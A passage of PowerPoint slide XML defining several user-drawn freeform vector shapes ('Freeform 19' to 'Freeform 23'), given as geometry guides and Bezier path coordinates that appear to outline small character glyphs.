                    <a:pt x="23" y="0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3"/>
                    <a:pt x="25" y="5"/>
                    <a:pt x="2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16"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="29" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="28"/>
                    <a:pt x="33" y="30"/>
                    <a:pt x="36" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="33"/>
                    <a:pt x="34" y="34"/>
                    <a:pt x="34" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="33"/>
                    <a:pt x="29" y="31"/>
                    <a:pt x="27" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="31"/>
                    <a:pt x="22" y="33"/>
                    <a:pt x="19" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="35"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="17" y="33"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="31"/>
                    <a:pt x="23" y="28"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="22"/>
                    <a:pt x="22" y="19"/>
                    <a:pt x="21" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="15"/>
                    <a:pt x="20" y="16"/>
                    <a:pt x="20" y="17"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="16"/>
                    <a:pt x="19" y="15"/>
                    <a:pt x="18" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="11"/>
                    <a:pt x="23" y="6"/>
                    <a:pt x="23" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="30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4" y="15"/>
                    <a:pt x="25" y="19"/>
                    <a:pt x="27" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="20"/>
                    <a:pt x="30" y="15"/>
                    <a:pt x="3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" name="Freeform 19"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7717068" y="-267218"/>
              <a:ext cx="57635" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 21 h 34"/>
                <a:gd name="T2" fmla="*/ 17 w 35"/>
                <a:gd name="T3" fmla="*/ 21 h 34"/>
                <a:gd name="T4" fmla="*/ 17 w 35"/>
                <a:gd name="T5" fmla="*/ 19 h 34"/>
                <a:gd name="T6" fmla="*/ 23 w 35"/>
                <a:gd name="T7" fmla="*/ 14 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 35"/>
                <a:gd name="T9" fmla="*/ 14 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 12 h 34"/>
                <a:gd name="T12" fmla="*/ 28 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 28 w 35"/>
                <a:gd name="T15" fmla="*/ 15 h 34"/>
                <a:gd name="T16" fmla="*/ 19 w 35"/>
                <a:gd name="T17" fmla="*/ 20 h 34"/>
                <a:gd name="T18" fmla="*/ 19 w 35"/>
                <a:gd name="T19" fmla="*/ 21 h 34"/>
                <a:gd name="T20" fmla="*/ 35 w 35"/>
                <a:gd name="T21" fmla="*/ 21 h 34"/>
                <a:gd name="T22" fmla="*/ 35 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 34"/>
                <a:gd name="T24" fmla="*/ 19 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 34"/>
                <a:gd name="T26" fmla="*/ 19 w 35"/>
                <a:gd name="T27" fmla="*/ 30 h 34"/>
                <a:gd name="T28" fmla="*/ 15 w 35"/>
                <a:gd name="T29" fmla="*/ 34 h 34"/>
                <a:gd name="T30" fmla="*/ 10 w 35"/>
                <a:gd name="T31" fmla="*/ 34 h 34"/>
                <a:gd name="T32" fmla="*/ 9 w 35"/>
                <a:gd name="T33" fmla="*/ 31 h 34"/>
                <a:gd name="T34" fmla="*/ 14 w 35"/>
                <a:gd name="T35" fmla="*/ 32 h 34"/>
                <a:gd name="T36" fmla="*/ 17 w 35"/>
                <a:gd name="T37" fmla="*/ 29 h 34"/>
                <a:gd name="T38" fmla="*/ 17 w 35"/>
                <a:gd name="T39" fmla="*/ 23 h 34"/>
                <a:gd name="T40" fmla="*/ 0 w 35"/>
                <a:gd name="T41" fmla="*/ 23 h 34"/>
                <a:gd name="T42" fmla="*/ 0 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 34"/>
                <a:gd name="T44" fmla="*/ 1 w 35"/>
                <a:gd name="T45" fmla="*/ 5 h 34"/>
                <a:gd name="T46" fmla="*/ 18 w 35"/>
                <a:gd name="T47" fmla="*/ 5 h 34"/>
                <a:gd name="T48" fmla="*/ 14 w 35"/>
                <a:gd name="T49" fmla="*/ 1 h 34"/>
                <a:gd name="T50" fmla="*/ 17 w 35"/>
                <a:gd name="T51" fmla="*/ 0 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 35"/>
                <a:gd name="T53" fmla="*/ 4 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 5 h 34"/>
                <a:gd name="T56" fmla="*/ 34 w 35"/>
                <a:gd name="T57" fmla="*/ 5 h 34"/>
                <a:gd name="T58" fmla="*/ 34 w 35"/>
                <a:gd name="T59" fmla="*/ 12 h 34"/>
                <a:gd name="T60" fmla="*/ 31 w 35"/>
                <a:gd name="T61" fmla="*/ 12 h 34"/>
                <a:gd name="T62" fmla="*/ 31 w 35"/>
                <a:gd name="T63" fmla="*/ 8 h 34"/>
                <a:gd name="T64" fmla="*/ 4 w 35"/>
                <a:gd name="T65" fmla="*/ 8 h 34"/>
                <a:gd name="T66" fmla="*/ 4 w 35"/>
                <a:gd name="T67" fmla="*/ 12 h 34"/>
                <a:gd name="T68" fmla="*/ 1 w 35"/>
                <a:gd name="T69" fmla="*/ 12 h 34"/>
                <a:gd name="T70" fmla="*/ 1 w 35"/>
                <a:gd name="T71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" h="34">
                  <a:moveTo>
                    <a:pt x="0" y="21"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21"/>
                    <a:pt x="17" y="21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3"/>
                    <a:pt x="18" y="34"/>
                    <a:pt x="15" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="34"/>
                    <a:pt x="12" y="34"/>
                    <a:pt x="10" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="33"/>
                    <a:pt x="9" y="32"/>
                    <a:pt x="9" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="31"/>
                    <a:pt x="13" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="32"/>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="29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21"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5"/>
                  </a:move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6" y="3"/>
                    <a:pt x="14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1"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="20" y="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" name="Freeform 20"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7831560" y="-267218"/>
              <a:ext cx="58415" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 17 h 34"/>
                <a:gd name="T2" fmla="*/ 9 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 34"/>
                <a:gd name="T4" fmla="*/ 12 w 35"/>
                <a:gd name="T5" fmla="*/ 1 h 34"/>
                <a:gd name="T6" fmla="*/ 9 w 35"/>
                <a:gd name="T7" fmla="*/ 9 h 34"/>
                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 34 h 34"/>
                <a:gd name="T10" fmla="*/ 6 w 35"/>
                <a:gd name="T11" fmla="*/ 34 h 34"/>
                <a:gd name="T12" fmla="*/ 6 w 35"/>
                <a:gd name="T13" fmla="*/ 15 h 34"/>
                <a:gd name="T14" fmla="*/ 1 w 35"/>
                <a:gd name="T15" fmla="*/ 21 h 34"/>
                <a:gd name="T16" fmla="*/ 0 w 35"/>
                <a:gd name="T17" fmla="*/ 17 h 34"/>
                <a:gd name="T18" fmla="*/ 10 w 35"/>
                <a:gd name="T19" fmla="*/ 22 h 34"/>
                <a:gd name="T20" fmla="*/ 19 w 35"/>
                <a:gd name="T21" fmla="*/ 17 h 34"/>
                <a:gd name="T22" fmla="*/ 19 w 35"/>
                <a:gd name="T23" fmla="*/ 1 h 34"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 1 h 34"/>
                <a:gd name="T26" fmla="*/ 22 w 35"/>
                <a:gd name="T27" fmla="*/ 15 h 34"/>
                <a:gd name="T28" fmla="*/ 31 w 35"/>
                <a:gd name="T29" fmla="*/ 5 h 34"/>
                <a:gd name="T30" fmla="*/ 34 w 35"/>
                <a:gd name="T31" fmla="*/ 6 h 34"/>
                <a:gd name="T32" fmla="*/ 22 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 22 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 24 w 35"/>
                <a:gd name="T37" fmla="*/ 31 h 34"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 31 h 34"/>
                <a:gd name="T40" fmla="*/ 31 w 35"/>
                <a:gd name="T41" fmla="*/ 28 h 34"/>
                <a:gd name="T42" fmla="*/ 32 w 35"/>
                <a:gd name="T43" fmla="*/ 23 h 34"/>
                <a:gd name="T44" fmla="*/ 35 w 35"/>
                <a:gd name="T45" fmla="*/ 24 h 34"/>
                <a:gd name="T46" fmla="*/ 34 w 35"/>
                <a:gd name="T47" fmla="*/ 29 h 34"/>
                <a:gd name="T48" fmla="*/ 29 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 34"/>
                <a:gd name="T50" fmla="*/ 23 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 34"/>
                <a:gd name="T52" fmla="*/ 19 w 35"/>
                <a:gd name="T53" fmla="*/ 29 h 34"/>
                <a:gd name="T54" fmla="*/ 19 w 35"/>
                <a:gd name="T55" fmla="*/ 20 h 34"/>
                <a:gd name="T56" fmla="*/ 12 w 35"/>
                <a:gd name="T57" fmla="*/ 24 h 34"/>
                <a:gd name="T58" fmla="*/ 10 w 35"/>
                <a:gd name="T5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34">
                  <a:moveTo>
                    <a:pt x="0" y="17"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="12"/>
                    <a:pt x="7" y="6"/>
                    <a:pt x="9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4"/>
                    <a:pt x="10" y="7"/>
                    <a:pt x="9" y="9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4" y="17"/>
                    <a:pt x="3" y="19"/>
                    <a:pt x="1" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="20"/>
                    <a:pt x="1" y="19"/>
                    <a:pt x="0" y="17"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="20"/>
                    <a:pt x="16" y="19"/>
                    <a:pt x="19" y="17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5" y="12"/>
                    <a:pt x="28" y="8"/>
                    <a:pt x="31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0" y="11"/>
                    <a:pt x="26" y="15"/>
                    <a:pt x="22" y="1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30"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="24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1"/>
                    <a:pt x="31" y="30"/>
                    <a:pt x="31" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="27"/>
                    <a:pt x="32" y="25"/>
                    <a:pt x="32" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="23"/>
                    <a:pt x="34" y="24"/>
                    <a:pt x="35" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="26"/>
                    <a:pt x="35" y="28"/>
                    <a:pt x="34" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="32"/>
                    <a:pt x="32" y="33"/>
                    <a:pt x="29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0" y="33"/>
                    <a:pt x="19" y="32"/>
                    <a:pt x="19" y="2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6" y="22"/>
                    <a:pt x="14" y="23"/>
                    <a:pt x="12" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="24"/>
                    <a:pt x="11" y="23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" name="Freeform 21"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7948389" y="-267218"/>
              <a:ext cx="56078" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 34"/>
                <a:gd name="T1" fmla="*/ 32 h 35"/>
                <a:gd name="T2" fmla="*/ 15 w 34"/>
                <a:gd name="T3" fmla="*/ 27 h 35"/>
                <a:gd name="T4" fmla="*/ 6 w 34"/>
                <a:gd name="T5" fmla="*/ 23 h 35"/>
                <a:gd name="T6" fmla="*/ 9 w 34"/>
                <a:gd name="T7" fmla="*/ 18 h 35"/>
                <a:gd name="T8" fmla="*/ 0 w 34"/>
                <a:gd name="T9" fmla="*/ 18 h 35"/>
                <a:gd name="T10" fmla="*/ 0 w 34"/>
                <a:gd name="T11" fmla="*/ 15 h 35"/>
                <a:gd name="T12" fmla="*/ 10 w 34"/>
                <a:gd name="T13" fmla="*/ 15 h 35"/>
                <a:gd name="T14" fmla="*/ 14 w 34"/>
                <a:gd name="T15" fmla="*/ 9 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 34"/>
                <a:gd name="T17" fmla="*/ 10 h 35"/>
                <a:gd name="T18" fmla="*/ 14 w 34"/>
                <a:gd name="T19" fmla="*/ 15 h 35"/>
                <a:gd name="T20" fmla="*/ 34 w 34"/>
                <a:gd name="T21" fmla="*/ 15 h 35"/>
                <a:gd name="T22" fmla="*/ 34 w 34"/>
                <a:gd name="T23" fmla="*/ 18 h 35"/>
                <a:gd name="T24" fmla="*/ 27 w 34"/>
                <a:gd name="T25" fmla="*/ 18 h 35"/>
                <a:gd name="T26" fmla="*/ 21 w 34"/>
                <a:gd name="T27" fmla="*/ 27 h 35"/>
                <a:gd name="T28" fmla="*/ 32 w 34"/>
                <a:gd name="T29" fmla="*/ 32 h 35"/>
                <a:gd name="T30" fmla="*/ 30 w 34"/>
                <a:gd name="T31" fmla="*/ 35 h 35"/>
                <a:gd name="T32" fmla="*/ 18 w 34"/>
                <a:gd name="T33" fmla="*/ 29 h 35"/>
                <a:gd name="T34" fmla="*/ 2 w 34"/>
                <a:gd name="T35" fmla="*/ 35 h 35"/>
                <a:gd name="T36" fmla="*/ 1 w 34"/>
                <a:gd name="T37" fmla="*/ 32 h 35"/>
                <a:gd name="T38" fmla="*/ 1 w 34"/>
                <a:gd name="T39" fmla="*/ 5 h 35"/>
                <a:gd name="T40" fmla="*/ 17 w 34"/>
                <a:gd name="T41" fmla="*/ 5 h 35"/>
                <a:gd name="T42" fmla="*/ 14 w 34"/>
                <a:gd name="T43" fmla="*/ 1 h 35"/>
                <a:gd name="T44" fmla="*/ 16 w 34"/>
                <a:gd name="T45" fmla="*/ 0 h 35"/>
                <a:gd name="T46" fmla="*/ 20 w 34"/>
                <a:gd name="T47" fmla="*/ 4 h 35"/>
                <a:gd name="T48" fmla="*/ 18 w 34"/>
                <a:gd name="T49" fmla="*/ 5 h 35"/>
                <a:gd name="T50" fmla="*/ 33 w 34"/>
                <a:gd name="T51" fmla="*/ 5 h 35"/>
                <a:gd name="T52" fmla="*/ 33 w 34"/>
                <a:gd name="T53" fmla="*/ 12 h 35"/>
                <a:gd name="T54" fmla="*/ 30 w 34"/>
                <a:gd name="T55" fmla="*/ 12 h 35"/>
                <a:gd name="T56" fmla="*/ 30 w 34"/>
                <a:gd name="T57" fmla="*/ 8 h 35"/>
                <a:gd name="T58" fmla="*/ 4 w 34"/>
                <a:gd name="T59" fmla="*/ 8 h 35"/>
                <a:gd name="T60" fmla="*/ 4 w 34"/>
                <a:gd name="T61" fmla="*/ 12 h 35"/>
                <a:gd name="T62" fmla="*/ 1 w 34"/>
                <a:gd name="T63" fmla="*/ 12 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 34"/>
                <a:gd name="T65" fmla="*/ 5 h 35"/>
                <a:gd name="T66" fmla="*/ 10 w 34"/>
                <a:gd name="T67" fmla="*/ 22 h 35"/>
                <a:gd name="T68" fmla="*/ 18 w 34"/>
                <a:gd name="T69" fmla="*/ 25 h 35"/>
                <a:gd name="T70" fmla="*/ 24 w 34"/>
                <a:gd name="T71" fmla="*/ 18 h 35"/>
                <a:gd name="T72" fmla="*/ 12 w 34"/>
                <a:gd name="T73" fmla="*/ 18 h 35"/>
                <a:gd name="T74" fmla="*/ 10 w 34"/>
                <a:gd name="T75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" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="32"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="31"/>
                    <a:pt x="12" y="29"/>
                    <a:pt x="15" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="26"/>
                    <a:pt x="9" y="24"/>
                    <a:pt x="6" y="23"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="21"/>
                    <a:pt x="8" y="19"/>
                    <a:pt x="9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3"/>
                    <a:pt x="13" y="11"/>
                    <a:pt x="14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2"/>
                    <a:pt x="15" y="13"/>
                    <a:pt x="1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21"/>
                    <a:pt x="24" y="24"/>
                    <a:pt x="21" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="28"/>
                    <a:pt x="28" y="30"/>
                    <a:pt x="32" y="32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7" y="33"/>
                    <a:pt x="23" y="31"/>
                    <a:pt x="18" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="32"/>
                    <a:pt x="9" y="33"/>
                    <a:pt x="2" y="35"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="34"/>
                    <a:pt x="1" y="33"/>
                    <a:pt x="1" y="32"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="5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5" y="3"/>
                    <a:pt x="14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1"/>
                    <a:pt x="19" y="3"/>
                    <a:pt x="20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5"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="22"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="23"/>
                    <a:pt x="15" y="24"/>
                    <a:pt x="18" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="23"/>
                    <a:pt x="23" y="21"/>
                    <a:pt x="2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9"/>
                    <a:pt x="10" y="20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6" name="Freeform 22"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8062881" y="-265661"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 20 w 35"/>
                <a:gd name="T1" fmla="*/ 0 h 32"/>
                <a:gd name="T2" fmla="*/ 19 w 35"/>
                <a:gd name="T3" fmla="*/ 0 h 32"/>
                <a:gd name="T4" fmla="*/ 35 w 35"/>
                <a:gd name="T5" fmla="*/ 12 h 32"/>
                <a:gd name="T6" fmla="*/ 33 w 35"/>
                <a:gd name="T7" fmla="*/ 15 h 32"/>
                <a:gd name="T8" fmla="*/ 17 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 32"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 32"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 13 h 32"/>
                <a:gd name="T14" fmla="*/ 16 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 32"/>
                <a:gd name="T16" fmla="*/ 20 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 32"/>
                <a:gd name="T18" fmla="*/ 1 w 35"/>
                <a:gd name="T19" fmla="*/ 30 h 32"/>
                <a:gd name="T20" fmla="*/ 16 w 35"/>
                <a:gd name="T21" fmla="*/ 30 h 32"/>
                <a:gd name="T22" fmla="*/ 16 w 35"/>
                <a:gd name="T23" fmla="*/ 23 h 32"/>
                <a:gd name="T24" fmla="*/ 5 w 35"/>
                <a:gd name="T25" fmla="*/ 23 h 32"/>
                <a:gd name="T26" fmla="*/ 5 w 35"/>
                <a:gd name="T27" fmla="*/ 21 h 32"/>
                <a:gd name="T28" fmla="*/ 16 w 35"/>
                <a:gd name="T29" fmla="*/ 21 h 32"/>
                <a:gd name="T30" fmla="*/ 16 w 35"/>
                <a:gd name="T31" fmla="*/ 15 h 32"/>
                <a:gd name="T32" fmla="*/ 6 w 35"/>
                <a:gd name="T33" fmla="*/ 15 h 32"/>
                <a:gd name="T34" fmla="*/ 6 w 35"/>
                <a:gd name="T35" fmla="*/ 13 h 32"/>
                <a:gd name="T36" fmla="*/ 29 w 35"/>
                <a:gd name="T37" fmla="*/ 13 h 32"/>
                <a:gd name="T38" fmla="*/ 29 w 35"/>
                <a:gd name="T39" fmla="*/ 15 h 32"/>
                <a:gd name="T40" fmla="*/ 19 w 35"/>
                <a:gd name="T41" fmla="*/ 15 h 32"/>
                <a:gd name="T42" fmla="*/ 19 w 35"/>
                <a:gd name="T43" fmla="*/ 21 h 32"/>
                <a:gd name="T44" fmla="*/ 30 w 35"/>
                <a:gd name="T45" fmla="*/ 21 h 32"/>
                <a:gd name="T46" fmla="*/ 30 w 35"/>
                <a:gd name="T47" fmla="*/ 23 h 32"/>
                <a:gd name="T48" fmla="*/ 19 w 35"/>
                <a:gd name="T49" fmla="*/ 23 h 32"/>
                <a:gd name="T50" fmla="*/ 19 w 35"/>
                <a:gd name="T51" fmla="*/ 30 h 32"/>
                <a:gd name="T52" fmla="*/ 33 w 35"/>
                <a:gd name="T53" fmla="*/ 30 h 32"/>
                <a:gd name="T54" fmla="*/ 33 w 35"/>
                <a:gd name="T55" fmla="*/ 32 h 32"/>
                <a:gd name="T56" fmla="*/ 1 w 35"/>
                <a:gd name="T57" fmla="*/ 32 h 32"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59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32">
                  <a:moveTo>
                    <a:pt x="20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3" y="6"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="35" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="13"/>
                    <a:pt x="34" y="14"/>
                    <a:pt x="33" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="12"/>
                    <a:pt x="22" y="8"/>
                    <a:pt x="17" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="7"/>
                    <a:pt x="9" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="15"/>
                    <a:pt x="0" y="14"/>
                    <a:pt x="0" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="9"/>
                    <a:pt x="13" y="5"/>
                    <a:pt x="16" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1" y="30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" y="32"/>
                    <a:pt x="1" y="32"/>
                    <a:pt x="1" y="3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7" name="Freeform 23"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8181267" y="-267218"/>
              <a:ext cx="52962" cy="57636"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 32"/>
                <a:gd name="T1" fmla="*/ 6 h 34"/>
                <a:gd name="T2" fmla="*/ 3 w 32"/>
                <a:gd name="T3" fmla="*/ 6 h 34"/>
                <a:gd name="T4" fmla="*/ 5 w 32"/>
                <a:gd name="T5" fmla="*/ 0 h 34"/>
                <a:gd name="T6" fmla="*/ 8 w 32"/>
                <a:gd name="T7" fmla="*/ 1 h 34"/>
                <a:gd name="T8" fmla="*/ 6 w 32"/>
                <a:gd name="T9" fmla="*/ 6 h 34"/>
                <a:gd name="T10" fmla="*/ 13 w 32"/>
                <a:gd name="T11" fmla="*/ 6 h 34"/>
                <a:gd name="T12" fmla="*/ 13 w 32"/>
                <a:gd name="T13" fmla="*/ 34 h 34"/>
                <a:gd name="T14" fmla="*/ 10 w 32"/>
                <a:gd name="T15" fmla="*/ 34 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 32"/>
                <a:gd name="T17" fmla="*/ 31 h 34"/>
                <a:gd name="T18" fmla="*/ 2 w 32"/>
                <a:gd name="T19" fmla="*/ 31 h 34"/>
                <a:gd name="T20" fmla="*/ 2 w 32"/>
                <a:gd name="T21" fmla="*/ 34 h 34"/>
                <a:gd name="T22" fmla="*/ 0 w 32"/>
                <a:gd name="T23" fmla="*/ 34 h 34"/>
                <a:gd name="T24" fmla="*/ 0 w 32"/>
                <a:gd name="T25" fmla="*/ 6 h 34"/>
                <a:gd name="T26" fmla="*/ 10 w 32"/>
                <a:gd name="T27" fmla="*/ 9 h 34"/>
                <a:gd name="T28" fmla="*/ 2 w 32"/>
                <a:gd name="T29" fmla="*/ 9 h 34"/>
                <a:gd name="T30" fmla="*/ 2 w 32"/>
                <a:gd name="T31" fmla="*/ 17 h 34"/>
                <a:gd name="T32" fmla="*/ 10 w 32"/>
                <a:gd name="T33" fmla="*/ 17 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 32"/>
                <a:gd name="T35" fmla="*/ 9 h 34"/>
                <a:gd name="T36" fmla="*/ 2 w 32"/>
                <a:gd name="T37" fmla="*/ 28 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 32"/>
                <a:gd name="T39" fmla="*/ 28 h 34"/>
                <a:gd name="T40" fmla="*/ 10 w 32"/>
                <a:gd name="T41" fmla="*/ 20 h 34"/>
                <a:gd name="T42" fmla="*/ 2 w 32"/>
                <a:gd name="T43" fmla="*/ 20 h 34"/>
                <a:gd name="T44" fmla="*/ 2 w 32"/>
                <a:gd name="T45" fmla="*/ 28 h 34"/>
                <a:gd name="T46" fmla="*/ 14 w 32"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 19 w 32"/>
                <a:gd name="T49" fmla="*/ 0 h 34"/>
                <a:gd name="T50" fmla="*/ 22 w 32"/>
                <a:gd name="T51" fmla="*/ 1 h 34"/>
                <a:gd name="T52" fmla="*/ 20 w 32"/>
                <a:gd name="T53" fmla="*/ 6 h 34"/>
                <a:gd name="T54" fmla="*/ 32 w 32"/>
                <a:gd name="T55" fmla="*/ 6 h 34"/>
                <a:gd name="T56" fmla="*/ 31 w 32"/>
                <a:gd name="T57" fmla="*/ 29 h 34"/>
                <a:gd name="T58" fmla="*/ 25 w 32"/>
                <a:gd name="T59" fmla="*/ 34 h 34"/>
                <a:gd name="T60" fmla="*/ 19 w 32"/>
                <a:gd name="T61" fmla="*/ 34 h 34"/>
                <a:gd name="T62" fmla="*/ 18 w 32"/>
                <a:gd name="T63" fmla="*/ 31 h 34"/>
                <a:gd name="T64" fmla="*/ 18 w 32"/>
                <a:gd name="T65" fmla="*/ 31 h 34"/>
                <a:gd name="T66" fmla="*/ 25 w 32"/>
                <a:gd name="T67" fmla="*/ 31 h 34"/>
                <a:gd name="T68" fmla="*/ 28 w 32"/>
                <a:gd name="T69" fmla="*/ 28 h 34"/>
                <a:gd name="T70" fmla="*/ 29 w 32"/>
                <a:gd name="T71" fmla="*/ 8 h 34"/>
                <a:gd name="T72" fmla="*/ 19 w 32"/>
                <a:gd name="T73" fmla="*/ 8 h 34"/>
                <a:gd name="T74" fmla="*/ 16 w 32"/>
                <a:gd name="T75" fmla="*/ 14 h 34"/>
                <a:gd name="T76" fmla="*/ 14 w 32"/>
                <a:gd name="T77" fmla="*/ 13 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 32"/>
                <a:gd name="T79" fmla="*/ 15 h 34"/>
                <a:gd name="T80" fmla="*/ 19 w 32"/>
